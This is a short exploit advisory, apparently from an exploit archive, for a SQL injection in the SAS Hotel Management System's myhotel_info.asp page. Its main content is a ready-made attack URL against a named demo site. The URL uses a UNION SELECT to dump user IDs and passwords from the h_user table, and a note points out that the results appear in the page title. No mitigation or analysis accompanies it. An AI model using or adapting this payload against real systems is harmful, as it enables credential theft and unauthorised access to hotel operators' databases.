SAS Hotel Management System suffers from a remote SQL injection vulnerability in myhotel_info.asp.
1839523d0458fbbbc8e92253d8b34c58852ce3f9d050edf3d1343db9a0551022
#found by DarkB0x
#contact darkB0x97[AT]googlemail.com
#greets for str0ke & AlpHaNiX
#script : SAS Hotel Management System
#download : Null
#script home page : http://www.sellatsite.com/sellatsite/hotel.asp
#Demo : http://www.aebest.com
#Exploits :
//*/
http://www.aebest.com/home/myhotel_info.asp?id=0+and+1=0+union+select+0,userid,0,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+h_user
#note : the injection's details are in page title ! xD